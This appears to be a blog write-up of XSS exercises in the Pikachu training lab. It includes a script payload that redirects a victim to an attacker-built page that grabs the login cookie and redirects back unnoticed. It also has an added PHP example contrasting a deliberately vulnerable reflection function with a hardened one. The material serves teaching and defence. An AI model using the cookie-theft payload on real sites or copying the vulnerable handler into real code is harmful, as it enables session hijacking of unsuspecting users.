pikachu - (2) XSS and CSRF

1. Reflected XSS (GET)

<script>alert(1)</script> (the input has a length limit, so the length restriction in the front end has to be modified first)

2. Reflected XSS (POST)

After logging in, this works the same way as the first case, but here the client's cookie can be stolen.

Stealing the cookie (the process does not depend on the input box; it mainly relies on inducing the user to click):

(1) The user is induced to click; this is equivalent to entering the following in the input box: <script>document.location = 'http://127.0.0.1:801/pikachu-master/pkxss/xcookie/post.html';</script>

http://127.0.0.1:801/pikachu-master/pkxss/xcookie/post.html (post.html is a malicious site that you build yourself)

(2) The malicious site sends a request to the target site http://127.0.0.1:801/pikachu-master/vul/xss/xsspost/xss_reflected_post.php (equivalent to making a request as the user to pick up the user's cookie; is that not CSRF already ....) and then obtains the user's login cookie for the site.

(3) To keep the user from noticing that something is wrong with the malicious site, the user is redirected back to the normal site.
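
The defensive side of the two cases above, as an added example that is not Pikachu's code and not part of the original post: a hypothetical PHP handler showing the reflected output next to a version that enforces the length on the server, encodes the value, and sets session cookie attributes that limit the cookie-stealing flow. The function names, the `message` parameter, `MAX_LEN` and the response text are assumptions.

```php
<?php
// Added example: hypothetical handler, not Pikachu's source code.
declare(strict_types=1);

const MAX_LEN = 20; // assumed limit; the page only says the front end caps the length

// Before: the parameter is reflected as-is, so markup in it becomes page content.
function render_vulnerable(string $message): string
{
    return "<p>You entered: {$message}</p>";
}

// After: the limit is enforced on the server (a front-end maxlength can be
// edited away) and the value is encoded for the HTML context it lands in.
function render_hardened(string $message): string
{
    if (strlen($message) > MAX_LEN) {
        return '<p>Input too long.</p>';
    }
    $safe = htmlspecialchars($message, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<p>You entered: {$safe}</p>";
}

// Session cookie attributes that blunt the cookie-stealing flow.
// HttpOnly keeps the cookie out of document.cookie. SameSite=Lax keeps it off
// POSTs started by a page on another site; in the lab both pages are on
// 127.0.0.1, which counts as the same site, so it changes nothing there.
function session_cookie_options(bool $https): array
{
    return [
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => $https,   // true whenever the site is served over HTTPS
        'httponly' => true,
        'samesite' => 'Lax',
    ];
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: the page's test string and a short markup sample.
    foreach (['<script>alert(1)</script>', '<i>hi</i>'] as $input) {
        echo 'vulnerable: ', render_vulnerable($input), PHP_EOL;
        echo 'hardened:   ', render_hardened($input), PHP_EOL;
    }
    print_r(session_cookie_options(false));
} else {
    // In the web application: set the options before the session starts.
    session_set_cookie_params(session_cookie_options(($_SERVER['HTTPS'] ?? 'off') !== 'off'));
    session_start();
    $m = $_POST['message'] ?? ''; // 'message' is an assumed parameter name
    echo render_hardened(is_string($m) ? $m : '');
}
```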

 

 


Origin www.cnblogs.com/P201721460006/p/12056497.html